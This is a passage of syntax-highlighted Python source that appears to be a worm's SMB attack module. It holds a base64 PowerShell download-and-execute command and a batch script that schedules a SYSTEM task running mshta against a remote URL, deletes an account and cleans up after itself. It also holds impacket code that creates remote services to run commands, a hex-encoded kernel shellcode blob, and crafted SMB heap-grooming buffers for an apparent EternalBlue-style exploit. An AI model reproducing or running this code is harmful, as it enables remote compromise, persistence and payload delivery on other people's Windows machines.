SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F) else start /b sc start Schedule^&amp;ping localhost^&amp;sc query Schedule^|findstr RUNNING^&amp;^&amp;^(schtasks /delete /TN Autocheck /f^&amp;schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"^&amp;schtasks /run /TN Autocheck^) &gt;&gt;c:/windows/temp/p.bat&amp;echo net start Ddriver &gt;&gt;c:/windows/temp/p.bat&amp;echo for /f  %%i in (</span><span class="se">\'</span><span class="s">tasklist ^^^| find /c /i "cmd.exe"</span><span class="se">\'</span><span class="s">^) do set s=%%i &gt;&gt;c:/windows/temp/p.bat&amp;echo if %s% gtr 10 (shutdown /r) &gt;&gt;c:/windows/temp/p.bat&amp;echo net user k8h3d /del &gt;&gt;c:/windows/temp/p.bat&amp;echo del c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">p.bat&gt;&gt;c:/windows/temp/p.bat&amp;cmd.exe /c c:/windows/temp/p.bat'</span>
    <span class="n">service_exec</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">bat</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">smb_send_file</span><span class="p">(</span><span class="n">smbConn</span><span class="p">,</span> <span class="n">localSrc</span><span class="p">,</span> <span class="n">remoteDrive</span><span class="p">,</span> <span class="n">remotePath</span><span class="p">):</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">localSrc</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fp</span><span class="p">:</span>
        <span class="n">smbConn</span><span class="p">.</span><span class="n">putFile</span><span class="p">(</span><span class="n">remoteDrive</span> <span class="o">+</span> <span class="s">'$'</span><span class="p">,</span> <span class="n">remotePath</span><span class="p">,</span> <span class="n">fp</span><span class="p">.</span><span class="n">read</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">service_exec</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">cmd</span><span class="p">):</span>
    <span class="kn">import</span> <span class="nn">random</span>
    <span class="n">random</span><span class="p">.</span><span class="n">choice</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">choice</span>
    <span class="n">random</span><span class="p">.</span><span class="n">randint</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">randint</span>
    <span class="kn">import</span> <span class="nn">string</span>
    <span class="kn">from</span> <span class="nn">impacket.dcerpc.v5</span> <span class="kn">import</span> <span class="n">transport</span><span class="p">,</span> <span class="n">srvs</span><span class="p">,</span> <span class="n">scmr</span>
    <span class="n">service_name</span> <span class="o">=</span> <span class="p">(</span><span class="s">''</span><span class="p">).</span><span class="n">join</span><span class="p">([</span><span class="n">random</span><span class="p">.</span><span class="n">choice</span><span class="p">(</span><span class="n">string</span><span class="p">.</span><span class="n">letters</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)])</span>
    <span class="n">rpcsvc</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">get_dce_rpc</span><span class="p">(</span><span class="s">'svcctl'</span><span class="p">)</span>
    <span class="n">rpcsvc</span><span class="p">.</span><span class="n">connect</span><span class="p">()</span>
    <span class="n">rpcsvc</span><span class="p">.</span><span class="n">bind</span><span class="p">(</span><span class="n">scmr</span><span class="p">.</span><span class="n">MSRPC_UUID_SCMR</span><span class="p">)</span>
    <span class="n">svcHandle</span> <span class="o">=</span> <span class="bp">None</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">'Opening SVCManager on %s.....'</span> <span class="o">%</span> <span class="n">conn</span><span class="p">.</span><span class="n">get_remote_host</span><span class="p">()</span>
            <span class="n">resp</span> <span class="o">=</span> <span class="n">scmr</span><span class="p">.</span><span class="n">hROpenSCManagerW</span><span class="p">(</span><span class="n">rpcsvc</span><span class="p">)</span>
            <span class="n">svcHandle</span> <span class="o">=</span> <span class="n">resp</span><span class="p">[</span><span class="s">'lpScHandle'</span><span class="p">]</span>
            <span class="k">try</span><span class="p">:</span>
                <span class="n">resp</span> <span class="o">=</span> <span class="n">scmr</span><span class="p">.</span><span class="n">hROpenServiceW</span><span class="p">(</span><span class="n">rpcsvc</span><span class="p">,</span> <span class="n">svcHandle</span><span class="p">,</span> <span class="n">service_name</span> <span class="o">+</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="p">)</span>
            <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
                <span class="k">if</span> <span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">).</span><span class="n">find</span><span class="p">(</span><span class="s">'ERROR_SERVICE_DOES_NOT_EXIST'</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">:</span>
                    <span class="k">raise</span> <span class="n">e</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="n">scmr</span><span class="p">.</span><span class="n">hRDeleteService</span><span class="p">(</span><span class="n">rpcsvc</span><span class="p">,</span> <span class="n">resp</span><span class="p">[</span><span class="s">'lpServiceHandle'</span><span class="p">])</span>
                <span class="n">scmr</span><span class="p">.</span><span class="n">hRCloseServiceHandle</span><span class="p">(</span><span class="n">rpcsvc</span><span class="p">,</span> <span class="n">resp</span><span class="p">[</span><span class="s">'lpServiceHandle'</span><span class="p">])</span>

            <span class="k">print</span> <span class="s">'Creating service %s.....'</span> <span class="o">%</span> <span class="n">service_name</span>
            <span class="n">resp</span> <span class="o">=</span> <span class="n">scmr</span><span class="p">.</span><span class="n">hRCreateServiceW</span><span class="p">(</span><span class="n">rpcsvc</span><span class="p">,</span> <span class="n">svcHandle</span><span class="p">,</span> <span class="n">service_name</span> <span class="o">+</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="p">,</span> <span class="n">service_name</span> <span class="o">+</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="p">,</span> <span class="n">lpBinaryPathName</span><span class="o">=</span><span class="n">cmd</span> <span class="o">+</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="p">)</span>
            <span class="n">serviceHandle</span> <span class="o">=</span> <span class="n">resp</span><span class="p">[</span><span class="s">'lpServiceHandle'</span><span class="p">]</span>
            <span class="k">if</span> <span class="n">serviceHandle</span><span class="p">:</span>
                <span class="k">try</span><span class="p">:</span>
                    <span class="k">print</span> <span class="s">'Starting service %s.....'</span> <span class="o">%</span> <span class="n">service_name</span>
                    <span class="n">scmr</span><span class="p">.</span><span class="n">hRStartServiceW</span><span class="p">(</span><span class="n">rpcsvc</span><span class="p">,</span> <span class="n">serviceHandle</span><span class="p">)</span>
                    <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
                    <span class="k">print</span> <span class="s">'Stoping service %s.....'</span> <span class="o">%</span> <span class="n">service_name</span>
                    <span class="n">scmr</span><span class="p">.</span><span class="n">hRControlService</span><span class="p">(</span><span class="n">rpcsvc</span><span class="p">,</span> <span class="n">serviceHandle</span><span class="p">,</span> <span class="n">scmr</span><span class="p">.</span><span class="n">SERVICE_CONTROL_STOP</span><span class="p">)</span>
                    <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
                <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
                    <span class="k">print</span> <span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">)</span>

                <span class="k">print</span> <span class="s">'Removing service %s.....'</span> <span class="o">%</span> <span class="n">service_name</span>
                <span class="n">scmr</span><span class="p">.</span><span class="n">hRDeleteService</span><span class="p">(</span><span class="n">rpcsvc</span><span class="p">,</span> <span class="n">serviceHandle</span><span class="p">)</span>
                <span class="n">scmr</span><span class="p">.</span><span class="n">hRCloseServiceHandle</span><span class="p">(</span><span class="n">rpcsvc</span><span class="p">,</span> <span class="n">serviceHandle</span><span class="p">)</span>
        <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">'ServiceExec Error on: %s'</span> <span class="o">%</span> <span class="n">conn</span><span class="p">.</span><span class="n">get_remote_host</span><span class="p">()</span>
            <span class="k">print</span> <span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">)</span>

    <span class="k">finally</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">svcHandle</span><span class="p">:</span>
            <span class="n">scmr</span><span class="p">.</span><span class="n">hRCloseServiceHandle</span><span class="p">(</span><span class="n">rpcsvc</span><span class="p">,</span> <span class="n">svcHandle</span><span class="p">)</span>

    <span class="n">rpcsvc</span><span class="p">.</span><span class="n">disconnect</span><span class="p">()</span>


<span class="n">scode</span> <span class="o">=</span> <span class="s">'31c0400f84be03000060e8000000005be823000000b9760100000f328d7b3c39f87411394500740689450089550889f831d20f3061c224008dab00100000c1ed0cc1e50c81ed50000000c3b92300000068300000000fa18ed98ec1648b0d400000008b6104519c60e8000000005be8c5ffffff8b450005170000008944242431c09942f00fb055087512b976010000998b45000f30fbe804000000fa619dc38b4500c1e80cc1e00c2d001000006681384d5a75f4894504b8787cf4dbe8e100000097b83f5f647757e8d500000029f889c13d70010000750505080000008d581c8d341f64a1240100008b3689f229c281fa0004000077f252b8e1140117e8a70000008b400a8d50048d340fe8d70000003d5a6afac174113dd883e03e740a8b3c1729d7e9e0ffffff897d0c8d1c1f8d75105f8b5b04b83e4cf8cee86a0000008b400a3ca077022c0829f8817c03fc0000000074de31c05568010000005550e800000000810424950000005053293c2456b8c45c196de82800000031c050505056b83446ccafe81800000085c074a48b451c80780e01740a8900894004e991ffffffc3e802000000ffe0608b6d04978b453c8b54057801ea8b4a188b5a2001eb498b348b01eee81d00000039f875f18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c35231c099acc1ca0d01c285c075f6925ac358894424105859585a6052518b2831c064a22400000099b04050c1e0065054528911514a52b8ea996e57e87bffffff85c07553588b38e8000000005e81c659000000b900040000f3a48b450c50b848b818b8e853ffffff8b400c8b40148b0066817824180075f68b5028817a0c3300320075ea8b5810895d04b85e515e83e82effffff59890131c08845084064a22400000061c35a585859515151e8000000008104240c000000515152ffe0dadeba67042d06d97424f45d31c9b14383c504315513033217cff340ff8dfcb800f2755d3132e1166282617a8f69276e041fe081adaad6ac2e862bafacd57f0f8c15724ec9487f028207d2b2a752ef39fb7377de4c755671c62c78700b45316a48608b01ba1e0ac3f2dfa12a3b12bb6bfccdce85fe70c9527caf5c402624c6acd6e99127d446d56ff9593a0405d1bdca8fa199ced4728357b1d5bc871a8918ccb7de108fdd21a6aa9022b8b4844a893f4b0c16ea2ff2f43e5a9ba0abe7c652062bffd0a2d404c8c7d1414e34a8da3b3a1fda6959f240b2b26fa9dca91b89554281bbb5cf7154856ba2cfd11791651b84bf1f081d60cfcf0504297ea0b01512455a3786feeed823702f46a81d46e659aeec84f824621b88e417e306d78333f87628500655e82e000000b9820000c00f324c8d0d370000004439c87419394500740a895504894500c645f8004991505a48c1ea200f305dc3488d2d0010000048c1ed0c48c1e50c4881ed70000000c30f01f865488924251000000065488b2425a8010000682b00000065ff342510000000505055e8bfffffff488b450048051f00000048894424105152415041514152415331c0b201f00fb055f87514b9820000c08b45008b55040f30fbe80e000000fa415b415a415941585a595d58c341574156575653504c8b7d0049c1ef0c49c1e70c4981ef001000006641813f4d5a75f14c897d08654c8b342588010000bf787cf4dbe8180100004891bf3f5f6477e8130100008b400389c33d0004000072050510000000488d50284c8d04114d89c14d8b094d39c80f84db0000004c89c84c29f0483d0007000077e64d29cebfe1140117e8d00000008b780381c708000000488d3419e8060100003d5a6afac174133dd883e03e740c488b0c394829f9e9ddffffffbf48b818b8e893000000488945f0488d34114889f3488b5b084839de74f74a8d1433bf3e4cf8cee8780000008b400348817c02f80000000074db488d4d104d31c04c8d0db50000005568010000005541504881ec20000000bfc45c196de83b000000488d4d104d31c9bf3446ccafe82a0000004881c44000000085c07497488b452080781a01740c48890048894008e981ffffff585b5e5f415e415fc3e802000000ffe0535156418b473c418b8407880000004c01f8508b48188b58204c01fbffc98b348b4c01fee81f00000039f875ef588b58244c01fb668b0c4b8b581c4c01fb8b048b4c01f85e595bc35231c099acc1ca0d01c285c075f6925ac3555357564157498b284c8b7d08525e4c89cb31c0440f22c048890289c148f7d14989c0b04050c1e006504989014881ec20000000bfea996e57e862ffffff4881c43000000085c07546488b3e488d354e000000b900060000f3a4488b45f0488b4018488b4020488b0066817848180075f5488b5050817a0c3300320075e84c8b7820bf5e515e83e81bffffff48890331c9884df8b101440f22c1415f5e5f5b5dc3489231c951514989c94c8d051300000089ca4881ec20000000ffd04881c430000000c3dac4d97424f4be15624e335f33c9b15731771a83c704037716e2e09e06b0eeaf7f76ee4f8036bf0ed0ea6ec7983b428250b7302d294ce6b5e1d954e6b9562ab671667d7cc835b04884f472e629960ef57d78af38b4756eba86649dee49381584189a2ed8a092310d53a2b9ad64a3f128a4d7667b24c838f06ef0fc8d2f20b5907fc313db80cdda504a469467651b15a1c195959d9314dcd352961fd3b4ed6e683642b4797d63650ca5cbc16415c8807b467653f76a3f178c33a3de93639a6b970b556a484a3e2d3013e7f781f3565e435e11e3af7ee0b1d09fba74763a73fd9a53d4fe645c864821a2394855a5394855edb4c554ecc6d51754f75ef82f07b5bcd0e51fc951acf958ec4dfab647edc01164f7b46b140ca419114863f16bc101f5d25c5c2f1b8b3dbd8014ee5e693b95d449b62670f818a342946b57930fb4f3e0a5fda86c5cad79518f30e1f5e9dc8c81d54c210977e1dabf188c5460860af90926ba72bec45d00515bedc8c6a3793b7df4565a1990a8'</span>
<span class="n">sc</span> <span class="o">=</span> <span class="n">binascii</span><span class="p">.</span><span class="n">unhexlify</span><span class="p">(</span><span class="n">scode</span><span class="p">)</span>
<span class="n">NTFEA_SIZE</span> <span class="o">=</span> <span class="mi">69632</span>
<span class="n">ntfea10000</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;BBH'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">65501</span><span class="p">)</span> <span class="o">+</span> <span class="s">'A'</span> <span class="o">*</span> <span class="mi">65502</span>
<span class="n">ntfea11000</span> <span class="o">=</span> <span class="p">(</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;BBH'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="p">)</span> <span class="o">*</span> <span class="mi">600</span>
<span class="n">ntfea11000</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;BBH'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">62397</span><span class="p">)</span> <span class="o">+</span> <span class="s">'A'</span> <span class="o">*</span> <span class="mi">62398</span>
<span class="n">ntfea1f000</span> <span class="o">=</span> <span class="p">(</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;BBH'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="p">)</span> <span class="o">*</span> <span class="mi">9364</span>
<span class="n">ntfea1f000</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;BBH'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">18669</span><span class="p">)</span> <span class="o">+</span> <span class="s">'A'</span> <span class="o">*</span> <span class="mi">18670</span>
<span class="n">ntfea</span> <span class="o">=</span> <span class="p">{</span><span class="mi">65536</span><span class="p">:</span> <span class="n">ntfea10000</span><span class="p">,</span> <span class="mi">69632</span><span class="p">:</span> <span class="n">ntfea11000</span><span class="p">}</span>
<span class="n">TARGET_HAL_HEAP_ADDR_x64</span> <span class="o">=</span> <span class="il">18446744073706405904L</span>
<span class="n">TARGET_HAL_HEAP_ADDR_x86</span> <span class="o">=</span> <span class="il">4292866048L</span>
<span class="n">fakeSrvNetBufferNsa</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;II'</span><span class="p">,</span> <span class="mi">69632</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span>
<span class="n">fakeSrvNetBufferNsa</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;HHI'</span><span class="p">,</span> <span class="mi">65535</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span>
<span class="n">fakeSrvNetBufferNsa</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">16</span>
<span class="n">fakeSrvNetBufferNsa</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;IIII'</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x86</span> <span class="o">+</span> <span class="mi">256</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x86</span> <span class="o">+</span> <span class="mi">32</span><span class="p">)</span>
<span class="n">fakeSrvNetBufferNsa</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;IIHHI'</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x86</span> <span class="o">+</span> <span class="mi">256</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">96</span><span class="p">,</span> <span class="mi">4100</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">fakeSrvNetBufferNsa</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;IIQ'</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x86</span> <span class="o">-</span> <span class="mi">128</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x64</span><span class="p">)</span>
<span class="n">fakeSrvNetBufferNsa</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;QQ'</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x64</span> <span class="o">+</span> <span class="mi">256</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">fakeSrvNetBufferNsa</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;QHHI'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">96</span><span class="p">,</span> <span class="mi">4100</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">fakeSrvNetBufferNsa</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;QQ'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x64</span> <span class="o">-</span> <span class="mi">128</span><span class="p">)</span>
<span class="n">fakeSrvNetBufferX64</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;II'</span><span class="p">,</span> <span class="mi">69632</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span>
<span class="n">fakeSrvNetBufferX64</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;HHIQ'</span><span class="p">,</span> <span class="mi">65535</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">fakeSrvNetBufferX64</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">16</span>
<span class="n">fakeSrvNetBufferX64</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">16</span>
<span class="n">fakeSrvNetBufferX64</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">16</span>
<span class="n">fakeSrvNetBufferX64</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;IIQ'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x64</span><span class="p">)</span>
<span class="n">fakeSrvNetBufferX64</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;QQ'</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x64</span> <span class="o">+</span> <span class="mi">256</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">fakeSrvNetBufferX64</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;QHHI'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">96</span><span class="p">,</span> <span class="mi">4100</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">fakeSrvNetBufferX64</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;QQ'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x64</span> <span class="o">-</span> <span class="mi">128</span><span class="p">)</span>
<span class="n">fakeSrvNetBuffer</span> <span class="o">=</span> <span class="n">fakeSrvNetBufferNsa</span>
<span class="n">feaList</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;I'</span><span class="p">,</span> <span class="mi">65536</span><span class="p">)</span>
<span class="n">feaList</span> <span class="o">+=</span> <span class="n">ntfea</span><span class="p">[</span><span class="n">NTFEA_SIZE</span><span class="p">]</span>
<span class="n">feaList</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;BBH'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">fakeSrvNetBuffer</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">fakeSrvNetBuffer</span>
<span class="n">feaList</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;BBH'</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">52</span><span class="p">,</span> <span class="mi">22136</span><span class="p">)</span>
<span class="n">fake_recv_struct</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;QII'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">fake_recv_struct</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">16</span>
<span class="n">fake_recv_struct</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;QII'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">fake_recv_struct</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">16</span> <span class="o">*</span> <span class="mi">7</span>
<span class="n">fake_recv_struct</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;QQ'</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x64</span> <span class="o">+</span> <span class="mi">160</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x64</span> <span class="o">+</span> <span class="mi">160</span><span class="p">)</span>
<span class="n">fake_recv_struct</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">16</span>
<span class="n">fake_recv_struct</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;IIQ'</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x86</span> <span class="o">+</span> <span class="mi">192</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x86</span> <span class="o">+</span> <span class="mi">192</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">fake_recv_struct</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">16</span> <span class="o">*</span> <span class="mi">11</span>
<span class="n">fake_recv_struct</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;QII'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x86</span> <span class="o">+</span> <span class="mi">400</span><span class="p">)</span>
<span class="n">fake_recv_struct</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;IIQ'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x86</span> <span class="o">+</span> <span class="mi">496</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">fake_recv_struct</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">16</span> <span class="o">*</span> <span class="mi">3</span>
<span class="n">fake_recv_struct</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;QQ'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x64</span> <span class="o">+</span> <span class="mi">480</span><span class="p">)</span>
<span class="n">fake_recv_struct</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;QQ'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">TARGET_HAL_HEAP_ADDR_x64</span> <span class="o">+</span> <span class="mi">496</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">getNTStatus</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
    <span class="k">return</span> <span class="bp">self</span><span class="p">[</span><span class="s">'ErrorCode'</span><span class="p">]</span> <span class="o">&lt;&lt;</span> <span class="mi">16</span> <span class="o">|</span> <span class="bp">self</span><span class="p">[</span><span class="s">'_reserved'</span><span class="p">]</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span> <span class="o">|</span> <span class="bp">self</span><span class="p">[</span><span class="s">'ErrorClass'</span><span class="p">]</span>


<span class="nb">setattr</span><span class="p">(</span><span class="n">smb</span><span class="p">.</span><span class="n">NewSMBPacket</span><span class="p">,</span> <span class="s">'getNTStatus'</span><span class="p">,</span> <span class="n">getNTStatus</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">sendEcho</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">NewSMBPacket</span><span class="p">()</span>
    <span class="n">pkt</span><span class="p">[</span><span class="s">'Tid'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tid</span>
    <span class="n">transCommand</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMBCommand</span><span class="p">(</span><span class="n">smb</span><span class="p">.</span><span class="n">SMB</span><span class="p">.</span><span class="n">SMB_COM_ECHO</span><span class="p">)</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">]</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMBEcho_Parameters</span><span class="p">()</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">]</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMBEcho_Data</span><span class="p">()</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'EchoCount'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">][</span><span class="s">'Data'</span><span class="p">]</span> <span class="o">=</span> <span class="n">data</span>
    <span class="n">pkt</span><span class="p">.</span><span class="n">addCommand</span><span class="p">(</span><span class="n">transCommand</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">sendSMB</span><span class="p">(</span><span class="n">pkt</span><span class="p">)</span>
